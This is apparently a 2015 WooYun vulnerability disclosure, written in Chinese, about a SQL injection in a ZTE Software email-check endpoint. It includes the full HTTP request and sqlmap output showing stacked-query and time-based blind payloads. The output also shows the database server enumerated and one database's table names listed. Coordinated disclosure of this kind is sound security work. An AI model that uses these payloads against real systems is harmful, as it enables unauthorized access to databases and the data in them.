当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102709

漏洞标题:中兴某接口存在SQL注入漏洞

相关厂商:中兴通讯股份有限公司

漏洞作者: 路人甲

提交时间:2015-03-23 10:40

修复时间:2015-05-07 13:58

公开时间:2015-05-07 13:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-23: 细节已通知厂商并且等待厂商处理中
2015-03-23: 厂商已经确认,细节仅向厂商公开
2015-04-02: 细节向核心白帽子及相关领域专家公开
2015-04-12: 细节向普通白帽子公开
2015-04-22: 细节向实习白帽子公开
2015-05-07: 细节向公众公开

简要描述:

详细说明:

http://www.ztesoft.com:18085/sq/emailcheck.aspx

中兴软创某接口,SQL注入:

POST /sq/emailcheck.aspx HTTP/1.1
Content-Length: 369
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.ztesoft.com:18085/
Cookie: ASP.NET_SessionId=sjtfsve1a3lq5a555vnfok45
Host: www.ztesoft.com:18085
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Button1=Submit&TextBox1=1&__VIEWSTATE=dDwxNjY3MDE2MTI4O3Q8O2w8aTwxPjs%2bO2w8dDw7bDxpPDE3Pjs%2bO2w8dDxwPHA8bDxOYXZpZ2F0ZVVybDs%2bO2w8bWFpbHRvOnh1LmR1b0B6dGUuY29tLmNuP3N1YmplY3Q9SSB3YW50IHRvIGpvaW4gdGhlIHNhdGlzZmFjdGlvbiBxdWVzdGlvbm5haXJlOz4%2bOz47Oz47Pj47Pj47Pndu%2bHogmyqqjAlTGkBPicUQLlMs&__VIEWSTATEGENERATOR=4607DA12

TextBox1参数

1.jpg


14个库:

sqlmap identified the following injection points with a total of 728 HTTP(s) requests:
---
Place: POST
Parameter: TextBox1
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
Payload: Button1=Submit&TextBox1=1'; IF(9302=9302) SELECT 9302 ELSE DROP FUNCTION aNqw--&__VIEWSTATE=dDwxNjY3MDE2MTI4O3Q8O2w8aTwxPjs+O2w8dDw7bDxpPDExPjtpPDE3Pjs+O2w8dDxwPHA8bDxUZXh0Oz47bDxTb3JyeSx0aGUgZW1haWwgZG9lc24ndCBleGlzdCE7Pj47Pjs7Pjt0PHA8cDxsPFRleHQ7TmF2aWdhdGVVcmw7PjtsPGhlcmUuO21haWx0bzp4dS5kdW9AenRlLmNvbS5jbj9zdWJqZWN0PUkgd2FudCB0byBqb2luIHRoZSBzYXRpc2ZhY3Rpb24gcXVlc3Rpb25uYWlyZTs+Pjs+Ozs+Oz4+Oz4+Oz4Ew/IvDbOOr+zt90lfyLuwIUVjug==&__VIEWSTATEGENERATOR=4607DA12
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: Button1=Submit&TextBox1=1'; WAITFOR DELAY '0:0:5'--&__VIEWSTATE=dDwxNjY3MDE2MTI4O3Q8O2w8aTwxPjs+O2w8dDw7bDxpPDExPjtpPDE3Pjs+O2w8dDxwPHA8bDxUZXh0Oz47bDxTb3JyeSx0aGUgZW1haWwgZG9lc24ndCBleGlzdCE7Pj47Pjs7Pjt0PHA8cDxsPFRleHQ7TmF2aWdhdGVVcmw7PjtsPGhlcmUuO21haWx0bzp4dS5kdW9AenRlLmNvbS5jbj9zdWJqZWN0PUkgd2FudCB0byBqb2luIHRoZSBzYXRpc2ZhY3Rpb24gcXVlc3Rpb25uYWlyZTs+Pjs+Ozs+Oz4+Oz4+Oz4Ew/IvDbOOr+zt90lfyLuwIUVjug==&__VIEWSTATEGENERATOR=4607DA12
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: Button1=Submit&TextBox1=1' WAITFOR DELAY '0:0:5'--&__VIEWSTATE=dDwxNjY3MDE2MTI4O3Q8O2w8aTwxPjs+O2w8dDw7bDxpPDExPjtpPDE3Pjs+O2w8dDxwPHA8bDxUZXh0Oz47bDxTb3JyeSx0aGUgZW1haWwgZG9lc24ndCBleGlzdCE7Pj47Pjs7Pjt0PHA8cDxsPFRleHQ7TmF2aWdhdGVVcmw7PjtsPGhlcmUuO21haWx0bzp4dS5kdW9AenRlLmNvbS5jbj9zdWJqZWN0PUkgd2FudCB0byBqb2luIHRoZSBzYXRpc2ZhY3Rpb24gcXVlc3Rpb25uYWlyZTs+Pjs+Ozs+Oz4+Oz4+Oz4Ew/IvDbOOr+zt90lfyLuwIUVjug==&__VIEWSTATEGENERATOR=4607DA12
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2005
available databases [14]:
[*] cot_bsn
[*] FAQDB
[*] lumigent
[*] LumigentDemoDB
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] TekRADIUS
[*] tempdb
[*] urtracker
[*] urtracker_bsn
[*] urtracker_ccb


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: TextBox1
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
Payload: Button1=Submit&TextBox1=1'; IF(9302=9302) SELECT 9302 ELSE DROP FUNCTION aNqw--&__VIEWSTATE=dDwxNjY3MDE2MTI4O3Q8O2w8aTwxPjs+O2w8dDw7bDxpPDExPjtpPDE3Pjs+O2w8dDxwPHA8bDxUZXh0Oz47bDxTb3JyeSx0aGUgZW1haWwgZG9lc24ndCBleGlzdCE7Pj47Pjs7Pjt0PHA8cDxsPFRleHQ7TmF2aWdhdGVVcmw7PjtsPGhlcmUuO21haWx0bzp4dS5kdW9AenRlLmNvbS5jbj9zdWJqZWN0PUkgd2FudCB0byBqb2luIHRoZSBzYXRpc2ZhY3Rpb24gcXVlc3Rpb25uYWlyZTs+Pjs+Ozs+Oz4+Oz4+Oz4Ew/IvDbOOr+zt90lfyLuwIUVjug==&__VIEWSTATEGENERATOR=4607DA12
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: Button1=Submit&TextBox1=1'; WAITFOR DELAY '0:0:5'--&__VIEWSTATE=dDwxNjY3MDE2MTI4O3Q8O2w8aTwxPjs+O2w8dDw7bDxpPDExPjtpPDE3Pjs+O2w8dDxwPHA8bDxUZXh0Oz47bDxTb3JyeSx0aGUgZW1haWwgZG9lc24ndCBleGlzdCE7Pj47Pjs7Pjt0PHA8cDxsPFRleHQ7TmF2aWdhdGVVcmw7PjtsPGhlcmUuO21haWx0bzp4dS5kdW9AenRlLmNvbS5jbj9zdWJqZWN0PUkgd2FudCB0byBqb2luIHRoZSBzYXRpc2ZhY3Rpb24gcXVlc3Rpb25uYWlyZTs+Pjs+Ozs+Oz4+Oz4+Oz4Ew/IvDbOOr+zt90lfyLuwIUVjug==&__VIEWSTATEGENERATOR=4607DA12
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: Button1=Submit&TextBox1=1' WAITFOR DELAY '0:0:5'--&__VIEWSTATE=dDwxNjY3MDE2MTI4O3Q8O2w8aTwxPjs+O2w8dDw7bDxpPDExPjtpPDE3Pjs+O2w8dDxwPHA8bDxUZXh0Oz47bDxTb3JyeSx0aGUgZW1haWwgZG9lc24ndCBleGlzdCE7Pj47Pjs7Pjt0PHA8cDxsPFRleHQ7TmF2aWdhdGVVcmw7PjtsPGhlcmUuO21haWx0bzp4dS5kdW9AenRlLmNvbS5jbj9zdWJqZWN0PUkgd2FudCB0byBqb2luIHRoZSBzYXRpc2ZhY3Rpb24gcXVlc3Rpb25uYWlyZTs+Pjs+Ozs+Oz4+Oz4+Oz4Ew/IvDbOOr+zt90lfyLuwIUVjug==&__VIEWSTATEGENERATOR=4607DA12
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2005
Database: cot_bsn
[101 tables]
+-----------------------------------+
| Accounts_AccessListItems |
| Accounts_AccessLists |
| Accounts_Department |
| Accounts_PermissionCategories |
| Accounts_Permissions |
| Accounts_RolePermissions |
| Accounts_Roles |
| Accounts_UserRoles |
| Accounts_UserState |
| Accounts_Users |
| Common_Config |
| Kb_ArticleAttachments |
| Kb_ArticleComment |
| Kb_Articles |
| Kb_Categories |
| PROBLEMCatalogGroup |
| Pts_DbDirectory |
| Pts_FilterNodes |
| Pts_Filters |
| Pts_GlobalSelectValues |
| Pts_GlobalSelects |
| Pts_ProblemAttachments |
| Pts_ProblemCatalogs |
| Pts_ProblemFields |
| Pts_ProblemHistory |
| Pts_ProblemInitStateWorkgroup |
| Pts_ProblemPriority |
| Pts_ProblemRelations |
| Pts_ProblemSeverity |
| Pts_ProblemShiftHistory |
| Pts_ProblemState |
| Pts_ProblemStateRecord |
| Pts_ProblemStateTimeLimit |
| Pts_ProblemStateTransfer |
| Pts_ProblemStateTransferWorkgroup |
| Pts_ProblemType |
| Pts_ProblemVisitHistory |
| Pts_Problems |
| Pts_ProjectCatalogs |
| Pts_ProjectStates |
| Pts_ProjectTempletDbDirectory |
| Pts_ProjectTemplets |
| Pts_Projects |
| Pts_RecordAttachments |
| Pts_Records |
| Pts_StateEditableFields |
| Pts_Version |
| Pts_WorkgroupUsers |
| Pts_Workgroups |
| TestGroup_Notify |
| Test_Env |
| TransFile_OCSEnv |
| Transfile_Environment |
| Transfile_Environment_Extend |
| Transfile_Environment_Extend_TEMP |
| Transfile_Environment_TEMP |
| Transfile_Environment_Web |
| Transfile_Environment_Web_TEMP |
| Transfile_Environment_bak |
| Transfile_Param |
| Transfile_URInfo |
| Transfile_VersionUpdate_Server |
| Transfile_Version_Num_Map |
| UR_TASK_PLAN |
| UR_TO_Project_Config |
| auto_testcase |
| bsnuser |
| ccb_state_type |
| dtproperties |
| holiday |
| office_contact |
| problem_user |
| pts_RecordType |
| tester |
| v_Accounts_Permissions |
| v_Accounts_Users |
| v_ExceedStat_no1 |
| v_Kb_ArticleList |
| v_Pts_ProblemAttachments |
| v_Pts_ProblemHistory |
| v_Pts_ProblemStateRecord |
| v_Pts_ProblemVisitHistory |
| v_Pts_Problems |
| v_Pts_ProblemsExceedStat |
| v_Pts_ProblemsFinishedExceedStat |
| v_Pts_ProblemsPutOffStat |
| v_Pts_ProblemsWithRecords |
| v_Pts_Projects |
| v_Pts_RecordAttachments |
| v_Pts_Records |
| v_Pts_UserWorkgroups |
| v_Pts_stat_StateKeepTime |
| v_QQ_QUERY |
| version_batch_control |
| version_info |
| version_plan |
| version_plan_log |
| webbuild_log |
| webbuild_server |
| pubuser.bsnuser_bak |
| pubuser.dy_test |
+-----------------------------------+


不深入了~

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-03-23 13:56

厂商回复:

感谢~

最新状态:

暂无